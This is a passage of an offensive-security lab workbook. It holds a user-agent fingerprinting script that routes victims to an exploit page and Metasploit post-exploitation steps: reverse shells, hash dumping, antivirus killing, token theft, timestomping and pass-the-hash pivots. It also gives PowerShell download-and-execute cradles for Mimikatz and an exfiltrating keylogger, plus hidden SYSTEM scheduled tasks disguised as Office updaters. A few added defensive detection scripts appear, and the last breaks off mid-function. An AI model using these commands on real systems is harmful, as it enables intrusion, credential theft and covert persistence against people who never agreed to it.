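        browser, major = "IE", int(MSIE_RE.search(ua).group(1))
    elif FIREFOX_RE.search(ua):
        browser, major = "Firefox", int(FIREFOX_RE.search(ua).group(1))
    elif CHROME_RE.search(ua):
        browser, major = "Chrome", int(CHROME_RE.search(ua).group(1))
    w = WINNT_RE.search(ua)
    if w:
        os_name = "Windows " + WINDOWS_RELEASES.get(w.group(1), w.group(1))
    elif "Mac OS X" in ua:
        os_name = "Mac OS X"
    else:
        os_name = "other"
    return browser, major, os_name


def choose_redirect(ua):
    return EXPLOIT_URL if fingerprint(ua) in TARGETS else DEFAULT_REDIRECT


def triage_log(text):
    """Return [(ip, browser, major, os, redirect), ...] for each log line."""
    rows = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ip, ua = line.split("\t", 1)
        browser, major, os_name = fingerprint(ua)
        rows.append((ip, browser, major, os_name, choose_redirect(ua)))
    return rows


if __name__ == "__main__":
    for row in triage_log(SAMPLE_LOG):
        print(*row)
```

Preferring the Trident token over the MSIE token is deliberate: a visitor running IE 9 in compatibility view advertises MSIE 7.0 but still carries Trident/5.0, and it is the engine version, not the advertised one, that decides whether the exploit fires. Sending non-targets to the default redirect also keeps the exploit page off the screens of people you cannot exploit, who would otherwise see a suspicious hang and report it.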


Lab 11: Client-Side Enumeration


Lab 11a: Getting your shell
echo yourname > /home/strategicsec/yourname.txt
cd /home/strategicsec/toolz/metasploit
./msfconsole
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set ExitOnSession true
set LHOST StrategicSec-Ubuntu-Tap0-IP
set LPORT 7777


exploit -j

Now you should only have to wait a few minutes and then you should see an incoming meterpreter
session.
We'll simulate having spear-phished a victim.
After that you should see metasploit sending the exploit to the IP address of a Windows 7 host, and after
that you should see a new session created.
You can list the active sessions by typing:
sessions -l
You can interact with any active session by typing sessions -i <n>, replacing <n> with the number of the
session you want. For the first session:
sessions -i 1
You should now see Metasploit's meterpreter prompt.

Lab 11b: Figure out who and where you are


meterpreter> sysinfo

meterpreter> getuid

meterpreter> ipconfig

meterpreter> run post/windows/gather/checkvm

meterpreter> run get_local_subnets

Lab 11c: Escalate privileges and get hashes

meterpreter> getsystem

meterpreter> getuid

meterpreter> run killav

meterpreter> run post/windows/gather/hashdump

meterpreter> run post/windows/gather/credentials/credential_collector

meterpreter> rev2self

meterpreter> getuid

Lab 11d: Enumerate the host you are on


meterpreter > run getcountermeasure

meterpreter> run winenum

meterpreter > run post/windows/gather/enum_applications

meterpreter > run post/windows/gather/enum_logged_on_users

meterpreter > run post/windows/gather/usb_history

meterpreter > run post/windows/gather/enum_shares

meterpreter > run post/windows/gather/enum_snmp

meterpreter> reg enumkey -k HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Run

Lab 11e: Steal Tokens


meterpreter > getsystem

meterpreter > use incognito

meterpreter > list_tokens -u

meterpreter > list_tokens -g

meterpreter > impersonate_token BUILTIN\\Users     <-- choose who you want to impersonate but be sure to use 2 slashes in the name (ex: impersonate_token domain\\user)

meterpreter> getuid

meterpreter> rev2self

Lab 11f: Prove access


meterpreter> upload /home/strategicsec/yourname.txt c:\\

meterpreter > timestomp C:\\yourname.txt -v

meterpreter > timestomp C:\\yourname.txt -m "12/12/2013 12:12:13"

meterpreter > timestomp C:\\yourname.txt -v

Lab 11g: Enumerate the network you are on


meterpreter > run netenum

meterpreter > run netenum -ps -r 10.10.30.0/24

meterpreter > run post/windows/gather/arp_scanner RHOSTS=10.10.30.0/24

Lab 11h: Set up your Pivot


meterpreter > background     <-- background the session

msf exploit(handler) > back     <--- you need to get to the main msf> prompt

sessions -l     <-- Find a session you want to pivot through (note the IP and session number)

You want to get back to this prompt:

Lab 11i: Now set up Pivot with a route add


route print
route add 10.10.30.50 255.255.255.0 28     <-- Use correct session id (2), it may be 3, or 4
route print     <----- verify new route

route remove 10.10.30.50 255.255.255.0 28     <-- Use correct session id (2), it may be 3, or 4
route print

Lab 11j: Scan through your Pivot


use auxiliary/scanner/portscan/tcp     <-- Run aux modules through your pivot
set THREADS 10
set RHOSTS 10.10.30.60-70     <-- Keep changing this IP and re-running the scan until you find something you want to attack
set RPORTS 445
run

Lab 11k: Lateral movement through your Pivot


use exploit/windows/smb/psexec
set SMBUser Administrator
set SMBPass aad3b435b51404eeaad3b435b51404ee:cffcd2a85b83b1566e6a785a33f5d0cf
set payload windows/meterpreter/reverse_tcp
set RHOST 10.10.30.63
set LHOST 10.10.5.235
set LPORT 5678
exploit

Lab 11l: Pivot Persistence


***Update Metasploit installation
***make two meterpreter sessions

use exploit/windows/smb/psexec
set SMBUser Administrator
set SMBPass aad3b435b51404eeaad3b435b51404ee:cffcd2a85b83b1566e6a785a33f5d0cf
set RHOST 10.10.30.87
set LPORT 5678
set LHOST StrategicSec-Ubuntu-Tap0-IP
exploit

background

set RHOST 10.10.30.81


exploit

background

use post/windows/manage/portproxy
sessions -l

set session 2

set local_port 9001
set local_address 0.0.0.0
set connect_port 9002
set connect_address 10.10.30.87
run

set session 1
set local_port 9002
set local_address 0.0.0.0
set connect_port 80
set connect_address 10.10.10.105
run

Test the proxy:
wget --server-response --spider 10.10.30.81:9001
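The post/windows/manage/portproxy module drives the Windows portproxy facility, which `netsh interface portproxy show all` lists on each host and which persists under HKLM\SYSTEM\CurrentControlSet\Services\PortProxy\v4tov4\tcp. As an added example for the defending side (not part of the lab), this Python script parses that netsh output collected from both pivot hosts (sample output constructed here to mirror the lab's chain) and reports listeners bound to every interface plus multi-hop forwarding chains:

```python
import re
from typing import Dict, List, Tuple

# Constructed sample: what `netsh interface portproxy show all` prints on the two pivot
# hosts after the lab's chain (10.10.30.81:9001 -> 10.10.30.87:9002 -> 10.10.10.105:80).
# The same rules persist in the registry under
# HKLM\SYSTEM\CurrentControlSet\Services\PortProxy\v4tov4\tcp, so they survive reboots.
NETSH_OUTPUT = {
    "10.10.30.81": """
Listen on ipv4:             Connect to ipv4:

Address         Port        Address         Port
--------------- ----------  --------------- ----------
0.0.0.0         9001        10.10.30.87     9002
""",
    "10.10.30.87": """
Listen on ipv4:             Connect to ipv4:

Address         Port        Address         Port
--------------- ----------  --------------- ----------
0.0.0.0         9002        10.10.10.105    80
""",
}

Rule = Tuple[str, int, str, int]  # (listen_addr, listen_port, connect_addr, connect_port)
RULE_RE = re.compile(r"^(\S+)\s+(\d+)\s+(\S+)\s+(\d+)$")


def parse_portproxy(text: str) -> List[Rule]:
    """Pull the forwarding rules out of netsh portproxy output; header lines never match."""
    rules = []
    for line in text.splitlines():
        m = RULE_RE.match(line.strip())
        if m:
            rules.append((m.group(1), int(m.group(2)), m.group(3), int(m.group(4))))
    return rules


def find_portproxy_findings(outputs: Dict[str, str]) -> List[dict]:
    """Flag rules listening on every interface and follow connect targets across hosts
    to expose multi-hop chains like the lab's double pivot."""
    rules_by_host = {host: parse_portproxy(text) for host, text in outputs.items()}
    # Index listeners by (host, port) so a rule's target can be matched to another host's rule.
    listeners = {}
    findings = []
    for host, rules in rules_by_host.items():
        for laddr, lport, caddr, cport in rules:
            listeners[(host, lport)] = (caddr, cport)
            if laddr in ("0.0.0.0", "*"):
                findings.append({"host": host, "kind": "wildcard_listener",
                                 "port": lport, "target": f"{caddr}:{cport}"})
    for host, rules in rules_by_host.items():
        for _, lport, caddr, cport in rules:
            path = [f"{host}:{lport}"]
            nxt = (caddr, cport)
            while nxt in listeners and len(path) < 16:   # length guard stops rule loops
                path.append(f"{nxt[0]}:{nxt[1]}")
                nxt = listeners[nxt]
            path.append(f"{nxt[0]}:{nxt[1]}")
            if len(path) > 2:                             # more than one hop: a chain
                findings.append({"host": host, "kind": "forwarding_chain",
                                 "path": " -> ".join(path)})
    return findings


if __name__ == "__main__":
    for finding in find_portproxy_findings(NETSH_OUTPUT):
        print(finding)
```

Feed it the real netsh output from each host in scope; a rule set that reaches an internal web server through two hops, as the lab builds, shows up as one `forwarding_chain` finding.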

Lab 11m: Set up a Socks Proxy through your Pivot


use auxiliary/server/socks4a
set SRVHOST 127.0.0.1
set SRVPORT 1080
run

Open a new terminal
sudo vi /etc/proxychains.conf
Comment out the proxy_dns, change the 9050 (tor port) to the metasploit socks proxy port (1080) and
save it.
socks4 127.0.0.1 1080

proxychains nmap -sT -PN -vv -sV --script=smb-os-discovery.nse -p 445 10.10.30.0/24

proxychains nmap -sT -PN -n -sV -p 21,22,23,25,80,110,139,443,1433,1521,3306,3389,8080,10000 10.10.30.0/24

Lab 11n: SSH Tunneling


sudo vi /etc/proxychains.conf
change last line to socks4 127.0.0.1 9060

Check the proxychains connection with:

proxychains wget 10.10.10.105
(this should not work yet; nothing is listening on port 9060 until the SSH tunnel below is up)

Connect to SSH:
ssh -D 127.0.0.1:9060 root@10.10.10.107

pass: mysql123

Open a new terminal and check the connection again.

Lab 11o: VPN Pivot


use exploit/multi/ssh/sshexec
set PASSWORD mysql123
set RHOST 10.10.10.107
set PAYLOAD linux/x86/meterpreter/reverse_tcp
set LHOST 10.10.5.235
set LPORT 4444
exploit

meterpreter > portfwd add -l 2222 -p 22 -r 127.0.0.1


background
route add 10.10.10.0 255.255.255.0 1
sudo apt-get install sshuttle
sudo sshuttle -vr root@127.0.0.1:2222 0/0
password: mysql123

test connection with http://www.whatismyip.com/

Lab 11p: ICMP Tunneling


open msfconsole
use exploit/windows/smb/psexec
set payload windows/meterpreter/reverse_tcp
set rhost 10.10.30.63
set lhost 10.10.5.235
set SMBUser Administrator
set SMBPass aad3b435b51404eeaad3b435b51404ee:cffcd2a85b83b1566e6a785a33f5d0cf
exploit
open second console
cd ~/toolz
git clone https://github.com/inquisb/icmpsh.git
cd icmpsh

from meterpreter session


meterpreter > getwd
C:\Windows\system32
meterpreter > getlwd
/home/strategicsec/toolz/metasploit
meterpreter > lcd ../icmpsh
meterpreter > getlwd
/home/strategicsec/toolz/icmpsh
meterpreter > upload icmpsh.exe
[*] uploading : icmpsh.exe -> icmpsh.exe
[*] uploaded : icmpsh.exe -> icmpsh.exe

meterpreter > shell


C:\Windows\system32>icmpsh.exe -t 10.10.5.235 -d 500 -b 30 -s 128

exit from shell and meterpreter session


return back to second console
sudo sysctl -w net.ipv4.icmp_echo_ignore_all=1
sudo python icmpsh_m.py 10.10.5.235 10.10.30.63
ipconfig
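From the network side the session above is echo traffic whose replies stop mirroring the request data (RFC 792 requires a reply to return the request's data unchanged), with the slave polling at the fixed -d interval using empty requests. As an added detection example (not from the lab or the icmpsh project), this Python analyzer pairs echo requests with their replies over a constructed packet list and reports exactly those signals:

```python
from collections import defaultdict
from statistics import mean, pstdev

ECHO_REPLY, ECHO_REQUEST = 0, 8

# Constructed sample capture (not real traffic), one dict per ICMP packet: a normal Windows
# ping from a workstation to its gateway, then an icmpsh-style session from the compromised
# host 10.10.30.63 to the operator box 10.10.5.235 (the lab's -d 500 gives a 0.5 s cadence).
WIN_PING_DATA = b"abcdefghijklmnopqrstuvwabcdefghi"
SAMPLE = []
for i in range(4):
    SAMPLE.append(dict(ts=10.0 + i, src="10.10.30.10", dst="10.10.30.1",
                       type=ECHO_REQUEST, id=1, seq=i, data=WIN_PING_DATA))
    SAMPLE.append(dict(ts=10.002 + i, src="10.10.30.1", dst="10.10.30.10",
                       type=ECHO_REPLY, id=1, seq=i, data=WIN_PING_DATA))
# (request data, reply data): the slave polls with empty requests, command output rides in
# requests, and commands come back in replies, so reply data stops mirroring request data.
TUNNEL = [(b"", b"ipconfig\n"), (b"Windows IP Configuration\r\n", b""),
          (b"   IPv4 Address. . . : 10.10.30.63\r\n", b""), (b"", b""),
          (b"", b"hostname\n"), (b"WIN7-X64-1\r\n", b"")]
for i, (up, down) in enumerate(TUNNEL):
    SAMPLE.append(dict(ts=20.0 + 0.5 * i, src="10.10.30.63", dst="10.10.5.235",
                       type=ECHO_REQUEST, id=7, seq=i, data=up))
    SAMPLE.append(dict(ts=20.001 + 0.5 * i, src="10.10.5.235", dst="10.10.30.63",
                       type=ECHO_REPLY, id=7, seq=i, data=down))


def analyze_icmp(packets, min_pairs=4):
    """Pair echo requests with their replies per (client, server) and report flows whose
    replies do not mirror the request data, with empty polling requests and cadence as context."""
    pending = {}                      # ((client, server), id, seq) -> request data
    flows = defaultdict(lambda: {"pairs": 0, "mismatched": 0, "empty_requests": 0, "req_ts": []})
    for p in sorted(packets, key=lambda pkt: pkt["ts"]):
        if p["type"] == ECHO_REQUEST:
            key = (p["src"], p["dst"])
            pending[(key, p["id"], p["seq"])] = p["data"]
            flows[key]["req_ts"].append(p["ts"])
            if not p["data"]:
                flows[key]["empty_requests"] += 1
        elif p["type"] == ECHO_REPLY:
            key = (p["dst"], p["src"])  # a reply travels server -> client
            sent = pending.pop((key, p["id"], p["seq"]), None)
            if sent is None:
                continue              # unsolicited reply; not paired here
            flows[key]["pairs"] += 1
            if p["data"] != sent:     # RFC 792: the reply must echo the request data
                flows[key]["mismatched"] += 1
    findings = []
    for (client, server), f in flows.items():
        if f["pairs"] < min_pairs or f["mismatched"] == 0:
            continue                  # plain ping: every reply mirrors its request
        gaps = [b - a for a, b in zip(f["req_ts"], f["req_ts"][1:])]
        interval = mean(gaps) if gaps else 0.0
        jitter = pstdev(gaps) / interval if interval else 0.0
        reasons = [f"{f['mismatched']}/{f['pairs']} replies carry data the request did not"]
        if f["empty_requests"]:
            reasons.append(f"{f['empty_requests']} zero-length polling requests")
        if gaps and jitter < 0.05:
            reasons.append(f"requests every {interval:.2f}s with near-zero jitter")
        findings.append({"client": client, "server": server, "pairs": f["pairs"],
                         "mismatched": f["mismatched"], "empty_requests": f["empty_requests"],
                         "interval": interval, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for finding in analyze_icmp(SAMPLE):
        print(finding["client"], "->", finding["server"], "; ".join(finding["reasons"]))
```

The normal ping flow is never reported even though it is just as regular, because the mismatch between request and reply data is the deciding signal; the operator's `icmp_echo_ignore_all=1` is what keeps the kernel from sending the mirroring reply that would otherwise compete with the tool's.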

Lab 11q: IPv6 to IPv4 Tunnel


Go to http://tunnelbroker.net and sign up for an account.
You will be emailed your account credentials.
route print
netsh
interface ipv6
show interfaces

add v6v4tunnel IP6Tunnel 192.168.1.9 216.218.224.42


add address IP6Tunnel 2001:470:1f0e:d9f::2
add route ::/0 IP6Tunnel 2001:470:1f0e:d9f::1

Reference:
http://www.cellstream.com/intranet/tipsandtricks/160-setting-up-a-6to4-tunnel-in-windows-7.html
IPv6 Direct Access
Reference:
http://www.slideshare.net/AlexdeJong/direct-access-for-dummies
http://directaccess.richardhicks.com/2013/06/24/isatap-recommendations-for-directaccess-deployments/

Lab 12: VBScript For Post Exploitation


Lab 12a: Identifying the IP Address
What is my external IP address?
echo Dim joe > ip.vbs
echo Set joe = CreateObject("MSXML2.XMLHTTP") >> ip.vbs
echo joe.open "GET", "http://icanhazip.com", False >> ip.vbs
echo joe.send >> ip.vbs
echo WScript.StdOut.Write joe.responseText >> ip.vbs

cscript ip.vbs

Lab 12b: Download a file from the internet


echo 'Barabas pure vbs downloader - tested on XP sp2' > vbs_download.vbs
echo 'Microsoft fixed adodbstream but guess what :)' >> vbs_download.vbs
echo '(c)dec 2004 >> vbs_download.vbs
echo 'First argument = complete url to download >> vbs_download.vbs
echo 'Second Argument = filename you want to save' >> vbs_download.vbs
echo 'thnks to http://www.ericphelps.com/scripting/samples/BinaryDownload/' >> vbs_download.vbs
echo 'v2 - now includes proxy support for the winhttp request stuff' >> vbs_download.vbs
echo strUrl = WScript.Arguments.Item(0) >> vbs_download.vbs
echo StrFile = WScript.Arguments.Item(1) >> vbs_download.vbs
echo 'WinHttpRequest proxy settings. >> vbs_download.vbs
echo Const HTTPREQUEST_PROXYSETTING_DEFAULT = 0 >> vbs_download.vbs
echo Const HTTPREQUEST_PROXYSETTING_PRECONFIG = 0 >> vbs_download.vbs
echo Const HTTPREQUEST_PROXYSETTING_DIRECT = 1 >> vbs_download.vbs
echo Const HTTPREQUEST_PROXYSETTING_PROXY = 2 >> vbs_download.vbs
echo Dim http, varByteArray, strData, strBuffer, lngCounter, fs, ts >> vbs_download.vbs
echo Err.Clear >> vbs_download.vbs
echo Set http = Nothing >> vbs_download.vbs
echo Set http = CreateObject("WinHttp.WinHttpRequest.5.1") >> vbs_download.vbs
echo If http Is Nothing Then Set http = CreateObject("WinHttp.WinHttpRequest") >> vbs_download.vbs
echo If http Is Nothing Then Set http = CreateObject("MSXML2.ServerXMLHTTP") >> vbs_download.vbs
echo If http Is Nothing Then Set http = CreateObject("Microsoft.XMLHTTP") >> vbs_download.vbs
echo ' comment out next line if no proxy is being used >> vbs_download.vbs
echo ' and change the proxy to suit ur needs -duh >> vbs_download.vbs
echo 'http.SetProxy HTTPREQUEST_PROXYSETTING_PROXY, "someproxy:8080" >> vbs_download.vbs
echo http.Open "GET", strURL, False >> vbs_download.vbs
echo http.Send >> vbs_download.vbs
echo varByteArray = http.ResponseBody >> vbs_download.vbs
echo Set http = Nothing >> vbs_download.vbs
echo Set fs = CreateObject("Scripting.FileSystemObject") >> vbs_download.vbs
echo Set ts = fs.CreateTextFile(StrFile, True) >> vbs_download.vbs
echo strData = "" >> vbs_download.vbs
echo strBuffer = "" >> vbs_download.vbs
echo For lngCounter = 0 to UBound(varByteArray) >> vbs_download.vbs
echo ts.Write Chr(255 And Ascb(Midb(varByteArray,lngCounter + 1, 1))) >> vbs_download.vbs
echo Next >> vbs_download.vbs
echo ts.Close >> vbs_download.vbs
more vbs_download.vbs

cscript vbs_download.vbs http://strategicsec.com/joe.txt joe.txt

Lab 13: Running Powershell From A Command Prompt


Lab 13a: Reverse Shell with Powershell
sudo ./msfconsole
use exploit/multi/handler
set ExitOnSession false
set payload windows/meterpreter/reverse_https
set LHOST 10.10.5.235
set LPORT 443
set EXITFUNC thread
exploit -j
powershell -command "IEX (New-Object Net.WebClient).DownloadString('https://s3.amazonaws.com/StrategicSec-Files/Powersploit/Invoke-Shellcode.ps1'); Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost 10.10.5.235 -Lport 443 -Force"

Lab 13b: Payload which could execute shellcode from DNS TXT queries.
powershell.exe (new-object System.Net.WebClient).DownloadFile('http://10.10.5.235/nishang/Execute-DNSTXT-Code.ps1','%TEMP%\Execute-DNSTXT-Code.ps1')
powershell.exe -ExecutionPolicy Bypass -command %TEMP%\Execute-DNSTXT-Code.ps1 32.alteredsecurity.com 64.alteredsecurity.com ns8.zoneedit.com

Lab 13c: Run mimikatz via powershell (must be run as SYSTEM)


powershell "IEX (New-Object Net.WebClient).DownloadString('http://10.10.5.235/PowerSploit/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds"

Lab 13d: Token Manipulation to escalate (must be run as an Administrator)


powershell -command "IEX (New-Object Net.WebClient).DownloadString('http://10.10.5.235/PowerSploit/Exfiltration/Invoke-TokenManipulation.ps1') ; Invoke-TokenManipulation"

Lab 13e: Nishang payload which scans IP addresses, ports and hostnames
powershell.exe (new-object System.Net.WebClient).DownloadFile('http://10.10.5.235/nishang/Invoke-PingSweep.ps1','%TEMP%\Invoke-PingSweep.ps1')
powershell.exe -ExecutionPolicy Bypass -command %TEMP%\Invoke-PingSweep.ps1 -StartAddress 10.10.30.50 -EndAddress 10.10.30.100 -ResolveHost -ScanPort

Lab 13f: Nishang Payload which gathers juicy information from the target.
powershell.exe (new-object System.Net.WebClient).DownloadFile('http://10.10.5.235/nishang/Get-Information.ps1','%TEMP%\Get-Information.ps1')
powershell.exe -ExecutionPolicy Bypass -command %TEMP%\Get-Information.ps1

Lab 13g: Nishang Payload which logs keys.

powershell.exe (new-object System.Net.WebClient).DownloadFile('http://10.10.5.235/nishang/Keylogger.ps1','%TEMP%\Keylogger.ps1')
powershell.exe -ExecutionPolicy Bypass -command %TEMP%\Keylogger.ps1 <dev_key> <username> <pass> 3 http://example.com stopthis

.PARAMETER dev_key
The unique API key provided by pastebin when you register a free account.
Unused for tinypaste.
Unused for gmail option.
.PARAMETER username
Username for the pastebin account where data would be pasted.
Username for the tinypaste account where data would be pasted.
Username for the gmail account where the data would be sent as an attachment.
.PARAMETER password
Password for the pastebin account where data would be pasted.
Password for the tinypaste account where data would be pasted.
Password for the gmail account where data would be sent.
.PARAMETER keyoutoption
The method you want to use for exfiltration of data.
"0" for displaying on console
"1" for pastebin.
"2" for gmail
"3" for tinypaste
.PARAMETER MagicString
The string which when found at CheckURL will stop the keylogger.
.PARAMETER CheckURL
The URL which would contain the MagicString used to stop keylogging.

Lab 13h: Nishang payload which silently browses to a URL and accepts the Java Applet Run Warning
(msfconsole 1)
use exploit/multi/browser/java_signed_applet
set SRVHOST 10.10.5.235
set URIPATH strategicsec
exploit
(msfconsole 2)
powershell.exe (new-object System.Net.WebClient).DownloadFile('http://10.10.5.235/nishang/Browse_Accept_Applet.ps1','%TEMP%\Browse_Accept_Applet.ps1')
powershell.exe -ExecutionPolicy Bypass -command %TEMP%\Browse_Accept_Applet.ps1 http://10.10.5.235:8080/strategicsec

Lab 13i: Nishang Payload which dumps keys for WLAN profiles.

powershell.exe (new-object System.Net.WebClient).DownloadFile('http://StrategicSec-Ubuntu-VM-Tap0-IP/nishang/Get-WLAN-Keys.ps1','%TEMP%\Get-WLAN-Keys.ps1')


powershell.exe -ExecutionPolicy Bypass -command %TEMP%\Get-WLAN-Keys.ps1

This script is a part of Nishang. It copies a file from an NTFS partitioned volume by reading the raw volume and parsing the NTFS structures. This bypasses file DACLs, read handle locks, and SACLs. You must be an administrator (elevated privileges) to run the script. This can be used to read SYSTEM files which are normally locked, such as the NTDS.dit file or registry hives.
powershell.exe (new-object System.Net.WebClient).DownloadFile('http://10.10.5.235/nishang/Invoke-NinjaCopy.ps1','%TEMP%\Invoke-NinjaCopy.ps1')
powershell.exe -ExecutionPolicy Bypass -command %TEMP%\Invoke-NinjaCopy.ps1 -path c:\windows\system32\config\system -localdestination %TEMP%\system

Nishang payload which dumps password hashes


powershell.exe (new-object System.Net.WebClient).DownloadFile('http://10.10.5.235/nishang/Get-PassHashes.ps1','%TEMP%\Get-PassHashes.ps1')
powershell.exe -ExecutionPolicy Bypass -command %TEMP%\Get-PassHashes.ps1

Nishang Payload which silently removes updates for a target machine.

powershell.exe (new-object System.Net.WebClient).DownloadFile('http://10.10.5.235/nishang/Remove-Update.ps1','%TEMP%\Remove-Update.ps1')
powershell.exe -ExecutionPolicy Bypass -command %TEMP%\Remove-Update.ps1 KB222222

Nishang payload which performs a Brute-Force Attack against SQL Server, Active Directory, Web and FTP
powershell.exe (new-object System.Net.WebClient).DownloadFile('http://10.10.5.235/nishang/Brute-Force.ps1','%TEMP%\Brute-Force.ps1')
powershell.exe -ExecutionPolicy Bypass -command %TEMP%\Brute-Force.ps1 -Identity ftp://10.10.5.235 -Service FTP

Nishang payload which performs a Brute-Force Attack against SQL Server, Active Directory, Web and FTP.
powershell.exe (new-object System.Net.WebClient).DownloadFile('http://10.10.5.235/nishang/Invoke-Medusa.ps1','%TEMP%\Invoke-Medusa.ps1')
powershell.exe -ExecutionPolicy Bypass -command %TEMP%\Invoke-Medusa.ps1 -Identity ftp://10.10.5.235 -UserName anonymous -Password 1 -Service FTP

Lab 14: SchTasks for Powershell

#(X86) - On User Login
schtasks /create /tn OfficeUpdaterA /tr "c:\windows\system32\WindowsPowerShell\v1.0\powershell.exe -WindowStyle hidden -NoLogo -NonInteractive -ep bypass -nop -c 'IEX ((new-object net.webclient).downloadstring (''http://StrategicSec-Ubuntu-Tap0-IP:8080/kBBldxiub6'''))'" /sc onlogon /ru System

#(X86) - On System Start


schtasks /create /tn OfficeUpdaterB /tr "c:\windows\system32\WindowsPowerShell\v1.0\powershell.exe -WindowStyle hidden -NoLogo -NonInteractive -ep bypass -nop -c 'IEX ((new-object net.webclient).downloadstring (''http://StrategicSec-Ubuntu-Tap0-IP:8080/kBBldxiub6'''))'" /sc onstart /ru System

#(X86) - On User Idle (30mins)
schtasks /create /tn OfficeUpdaterC /tr "c:\windows\system32\WindowsPowerShell\v1.0\powershell.exe -WindowStyle hidden -NoLogo -NonInteractive -ep bypass -nop -c 'IEX ((new-object net.webclient).downloadstring (''http://StrategicSec-Ubuntu-Tap0-IP:8080/kBBldxiub6'''))'" /sc onidle /i 30

#(X64) - On User Login


schtasks /create /tn OfficeUpdaterA /tr "c:\windows\syswow64\WindowsPowerShell\v1.0\powershell.exe -WindowStyle hidden -NoLogo -NonInteractive -ep bypass -nop -c 'IEX ((new-object net.webclient).downloadstring (''http://StrategicSec-Ubuntu-Tap0-IP:8080/kBBldxiub6'''))'" /sc onlogon /ru System

#(X64) - On System Start

schtasks /create /tn OfficeUpdaterB /tr "c:\windows\syswow64\WindowsPowerShell\v1.0\powershell.exe -WindowStyle hidden -NoLogo -NonInteractive -ep bypass -nop -c 'IEX ((new-object net.webclient).downloadstring (''http://StrategicSec-Ubuntu-Tap0-IP:8080/kBBldxiub6'''))'" /sc onstart /ru System

#(X64) - On User Idle (30mins)


schtasks /create /tn OfficeUpdaterC /tr "c:\windows\syswow64\WindowsPowerShell\v1.0\powershell.exe -WindowStyle hidden -NoLogo -NonInteractive -ep bypass -nop -c 'IEX ((new-object net.webclient).downloadstring (''http://StrategicSec-Ubuntu-Tap0-IP:8080/kBBldxiub6'''))'" /sc onidle /i 30

Use exploit/windows/misc/psh_web_delivery
(fill required information)

open second console


cd /var/www
sudo wget http://10.10.5.235:8080/strategicsec32
sudo cp strategicsec32 strategicsec64

You now have an attack URL, but it only works on 32-bit.

powershell.exe -w hidden -nop -ep bypass -c "IEX ((new-object net.webclient).downloadstring('http://<ip>/payload1'))"
Use base64 and encode it to avoid IEX evaluating it inline:
%WINDIR%\syswow64\WindowsPowerShell\v1.0\powershell.exe -w hidden -nop -ep bypass -c "IEX ((new-object net.webclient).downloadstring('http://<ip>/payload2'))"

(example)
Place the if statement in payload1 (strategicsec32):
Set-StrictMode -Version 2
if ($env:Processor_Architecture -ne "x86") {
cmd /c ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String(("JVdJTkRJUiVcc3lzd293NjRcV2luZG93c1Bvd2VyU2hlbGxcdjEuMFxwb3dlcnNoZWxsLmV4ZSAtdyBoaWRkZW4gLW5vcCAtZXAgYnlwYXNzIC1jICJJRVggKChuZXctb2JqZWN0IG5ldC53ZWJjbGllbnQpLmRvd25sb2Fkc3RyaW5nKCdodHRwOi8vMTAuMTAuNS4yMzUvc3RyYXRlZ2ljc2VjNjQnKSki"))))
exit
}
sudo nano strategicsec32

Your string now works on 32-bit and 64-bit.
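The download cradles in Lab 13, the OfficeUpdater tasks above, and the Base64-wrapped 64-bit relaunch all leave the same marks in a task's action or a process command line: a hidden window, -nop, -ep bypass, IEX, a WebClient download, and a syswow64 PowerShell path. As an added defender-side example (not part of the lab), this Python triage script scores `schtasks /query /fo CSV /v` rows (constructed here and trimmed to the relevant columns) and raw command lines for those indicators, decoding any FromBase64String literal so the wrapped stage is scored too; the Base64 string is the lab's own and unwraps to the syswow64 cradle:

```python
import base64
import csv
import io
import re

# Indicators drawn from the cradles and tasks in Labs 13 and 14; the weights are this
# example's own choice, not a published standard.
INDICATORS = [
    (r"-w(?:indowstyle)?\s+hidden", "hidden window", 2),
    (r"-nop\b|-noprofile\b", "no profile", 1),
    (r"-noni\b|-noninteractive\b", "non-interactive", 1),
    (r"-ep\s+bypass|-executionpolicy\s+bypass", "execution policy bypass", 2),
    (r"\biex\b|invoke-expression", "Invoke-Expression", 2),
    (r"downloadstring|downloadfile", "WebClient download", 3),
    (r"\\syswow64\\windowspowershell", "32-bit PowerShell on a 64-bit host", 2),
    (r"frombase64string", "embedded Base64 stage", 2),
]
B64_RE = re.compile(r"FromBase64String\(\s*\(?\s*[\"']([A-Za-z0-9+/=]{16,})[\"']", re.I)
URL_RE = re.compile(r"https?://[^\s'\")]+", re.I)

# Constructed `schtasks /query /fo CSV /v` output, trimmed to the columns used here; the
# OfficeUpdaterA row is the lab's on-logon task, the other two are ordinary admin jobs.
SCHTASKS_CSV = r'''"HostName","TaskName","Task To Run","Run As User","Schedule Type"
"WIN7-X64-1","\Backup\NightlyBackup","C:\Scripts\backup.cmd","SYSTEM","Daily"
"WIN7-X64-1","\Maint\RotateLogs","powershell.exe -File C:\Scripts\rotate-logs.ps1","SYSTEM","Weekly"
"WIN7-X64-1","\OfficeUpdaterA","c:\windows\system32\WindowsPowerShell\v1.0\powershell.exe -WindowStyle hidden -NoLogo -NonInteractive -ep bypass -nop -c 'IEX ((new-object net.webclient).downloadstring(''http://StrategicSec-Ubuntu-Tap0-IP:8080/kBBldxiub6''))'","SYSTEM","At logon time"
'''

# The lab's 32-bit stager line that re-launches a 64-bit PowerShell from a Base64 string.
STAGER_32 = ("cmd /c ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String((\""
             "JVdJTkRJUiVcc3lzd293NjRcV2luZG93c1Bvd2VyU2hlbGxcdjEuMFxwb3dlcnNoZWxsLmV4ZSAtdyBoaWRkZW4gLW5vcCAtZXAg"
             "YnlwYXNzIC1jICJJRVggKChuZXctb2JqZWN0IG5ldC53ZWJjbGllbnQpLmRvd25sb2Fkc3RyaW5nKCdodHRwOi8vMTAuMTAuNS4yMzUvc3RyYXRlZ2ljc2VjNjQnKSki"
             "\"))))")


def decode_stages(cmd: str) -> list:
    """Decode every Base64 literal handed to FromBase64String so the wrapped command
    is scanned with the same indicators as the visible one."""
    stages = []
    for blob in B64_RE.findall(cmd):
        try:
            stages.append(base64.b64decode(blob, validate=True).decode("utf-8", "replace"))
        except ValueError:
            continue                     # not valid Base64; leave it to a human
    return stages


def score_command(cmd: str) -> dict:
    """Score one command line plus anything it unwraps from Base64."""
    stages = decode_stages(cmd)
    text = " ".join([cmd] + stages)
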